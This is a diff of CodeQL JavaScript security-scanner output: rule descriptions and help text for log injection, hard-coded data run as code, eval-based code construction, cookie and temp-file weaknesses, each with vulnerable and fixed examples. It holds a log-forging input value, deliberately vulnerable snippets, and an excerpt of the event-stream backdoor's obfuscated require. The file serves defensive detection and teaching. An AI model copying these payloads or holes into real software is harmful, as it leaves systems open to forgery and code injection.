\\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n", + "markdown" : "# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides \\`username=Guest%0a\\[INFO\\]+User:+Admin%0a\\` as a username parameter, the log entry will be splitted in two different lines, where the second line will be \\`\\[INFO\\]+User:+Admin\\`.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n console.info(`[INFO] User: ${q.query.username}`); // BAD: User input logged as-is\n})\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\nIn the second example, `String.prototype.replace` is used to ensure no line endings are present in the user input.\n\n\n```javascript\nconst http = require('http');\nconst url = require('url');\n\nconst server = http.createServer((req, res) => {\n let q = url.parse(req.url, true);\n\n // GOOD: remove newlines from user controlled input before logging\n let username = q.query.username.replace(/\\n|\\r/g, \"\");\n\n console.info(`[INFO] User: ${username}`);\n});\n\nserver.listen(3000, '127.0.0.1', () => {});\n\n```\n\n## References\n* OWASP: [Log Injection](https://www.owasp.org/index.php/Log_Injection).\n* Common Weakness Enumeration: [CWE-117](https://cwe.mitre.org/data/definitions/117.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/log-injection", + "kind" : "path-problem", + "name" : "Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/password-in-configuration-file", + "name" : "js/password-in-configuration-file", + "shortDescription" : { + "text" : "Password in configuration file" + }, + "fullDescription" : { + "text" : "Storing unencrypted passwords in configuration files is unsafe." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n", + "markdown" : "# Password in configuration file\nStoring a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resources. Therefore it is a common attack vector.\n\n\n## Recommendation\nPasswords stored in configuration files should always be encrypted.\n\n\n## References\n* Common Weakness Enumeration: [CWE-256](https://cwe.mitre.org/data/definitions/256.html).\n* Common Weakness Enumeration: [CWE-260](https://cwe.mitre.org/data/definitions/260.html).\n* Common Weakness Enumeration: [CWE-313](https://cwe.mitre.org/data/definitions/313.html).\n* Common Weakness Enumeration: [CWE-522](https://cwe.mitre.org/data/definitions/522.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-256", "external/cwe/cwe-260", "external/cwe/cwe-313", "external/cwe/cwe-522" ], + "description" : "Storing unencrypted passwords in configuration files is unsafe.", + "id" : "js/password-in-configuration-file", + "kind" : "problem", + "name" : "Password in configuration file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/empty-password-in-configuration-file", + "name" : "js/empty-password-in-configuration-file", + "shortDescription" : { + "text" : "Empty password in configuration file" + }, + "fullDescription" : { + "text" : "Failing to set a password reduces the security of your code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n", + "markdown" : "# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-258", "external/cwe/cwe-862" ], + "description" : "Failing to set a password reduces the security of your code.", + "id" : "js/empty-password-in-configuration-file", + "kind" : "problem", + "name" : "Empty password in configuration file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/hardcoded-data-interpreted-as-code", + "name" : "js/hardcoded-data-interpreted-as-code", + "shortDescription" : { + "text" : "Hard-coded data interpreted as code" + }, + "fullDescription" : { + "text" : "Transforming hard-coded data (such as hexadecimal constants) into code to be executed is a technique often associated with backdoors and should be avoided." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n", + "markdown" : "# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-506" ], + "description" : "Transforming hard-coded data (such as hexadecimal constants) into code\n to be executed is a technique often associated with backdoors and should\n be avoided.", + "id" : "js/hardcoded-data-interpreted-as-code", + "kind" : "path-problem", + "name" : "Hard-coded data interpreted as code", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/user-controlled-bypass", + "name" : "js/user-controlled-bypass", + "shortDescription" : { + "text" : "User-controlled bypass of security check" + }, + "fullDescription" : { + "text" : "Conditions that the user controls are not suited for making security-related decisions." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n", + "markdown" : "# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.cookies.loggedInUserId !== req.params.userId) {\n // BAD: login decision made based on user controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n if (req.signedCookies.loggedInUserId !== req.params.userId) {\n // GOOD: login decision made based on server controlled data\n requireLogin();\n } else {\n // ... show private information\n }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-807", "external/cwe/cwe-290" ], + "description" : "Conditions that the user controls are not suited for making security-related decisions.", + "id" : "js/user-controlled-bypass", + "kind" : "path-problem", + "name" : "User-controlled bypass of security check", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/unsafe-code-construction", + "name" : "js/unsafe-code-construction", + "shortDescription" : { + "text" : "Unsafe code constructed from library input" + }, + "fullDescription" : { + "text" : "Using externally controlled strings to construct code may allow a malicious user to execute arbitrary code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Using externally controlled strings to construct code may allow a malicious\n user to execute arbitrary code.", + "id" : "js/unsafe-code-construction", + "kind" : "path-problem", + "name" : "Unsafe code constructed from library input", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "6.1" + } + }, { + "id" : "js/samesite-none-cookie", + "name" : "js/samesite-none-cookie", + "shortDescription" : { + "text" : "Sensitive cookie without SameSite restrictions" + }, + "fullDescription" : { + "text" : "Sensitive cookies where the SameSite attribute is set to \"None\" can in some cases allow for Cross-Site Request Forgery (CSRF) attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n", + "markdown" : "# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n res.end('

Hello world

');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1275" ], + "description" : "Sensitive cookies where the SameSite attribute is set to \"None\" can\n in some cases allow for Cross-Site Request Forgery (CSRF) attacks.", + "id" : "js/samesite-none-cookie", + "kind" : "problem", + "name" : "Sensitive cookie without SameSite restrictions", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/file-system-race", + "name" : "js/file-system-race", + "shortDescription" : { + "text" : "Potential file system race condition" + }, + "fullDescription" : { + "text" : "Separately checking the state of a file before operating on it may allow an attacker to modify the file between the two operations." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n", + "markdown" : "# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-367" ], + "description" : "Separately checking the state of a file before operating\n on it may allow an attacker to modify the file between\n the two operations.", + "id" : "js/file-system-race", + "kind" : "problem", + "name" : "Potential file system race condition", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.7" + } + }, { + "id" : "js/insecure-temporary-file", + "name" : "js/insecure-temporary-file", + "shortDescription" : { + "text" : "Insecure temporary file" + }, + "fullDescription" : { + "text" : "Creating a temporary file that is accessible by other users can lead to information disclosure and sometimes remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n", + "markdown" : "# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n" + }, + "properties" : { + "tags" : [ "external/cwe/cwe-377", "external/cwe/cwe-378", "security" ], + "description" : "Creating a temporary file that is accessible by other users can\n lead to information disclosure and sometimes remote code execution.", + "id" : "js/insecure-temporary-file", + "kind" : "path-problem", + "name" : "Insecure temporary file", + "precision" : "medium", + "problem.severity" : "warning", + "security-severity" : "7.0" + } + }, { + "id" : "js/summary/lines-of-code", + "name" : "js/summary/lines-of-code", + "shortDescription" : { + "text" : "Total lines of JavaScript and TypeScript code in the database" + }, + "fullDescription" : { + "text" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "summary" ], + "description" : "The total number of lines of JavaScript or TypeScript code across all files checked into the repository, except in `node_modules`. This is a useful metric of the size of a database. For all files that were seen during extraction, this query counts the lines of code, excluding whitespace or comments.", + "id" : "js/summary/lines-of-code", + "kind" : "metric", + "name" : "Total lines of JavaScript and TypeScript code in the database" + } + }, { + "id" : "js/summary/lines-of-user-code", + "name" : "js/summary/lines-of-user-code", + "shortDescription" : { + "text" : "Total lines of user written JavaScript and TypeScript code in the database" + }, + "fullDescription" : { + "text" : "The total number of lines of JavaScript and TypeScript code from the source code directory, excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding whitespace or comments." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "summary", "lines-of-code" ], + "description" : "The total number of lines of JavaScript and TypeScript code from the source code directory,\n excluding auto-generated files and files in `node_modules`. This query counts the lines of code, excluding\n whitespace or comments.", + "id" : "js/summary/lines-of-user-code", + "kind" : "metric", + "name" : "Total lines of user written JavaScript and TypeScript code in the database" + } + } ], + "locations" : [ { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///opt/hostedtoolcache/CodeQL/2.15.1/x64/codeql/qlpacks/codeql/javascript-queries/0.8.1/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + } ] }, - "warning": { - "+": 0, - "-": 15, - "codes": { - "js/ui5-xss XSS vulnerability due to [user-provided value](1).": { - "<": 20, - ">": 0 - }, - "js/ui5-log-injection Log entry depends on a [user-provided value](1).": { - "<": 8, - ">": 0 - }, - "js/cap-sql-injection This query depends on a [user-provided value](1).": { - "<": 6, - ">": 0 - }, - "js/log-injection Log entry depends on a [user-provided value](1).": { - "<": 5, - ">": 0 - }, - 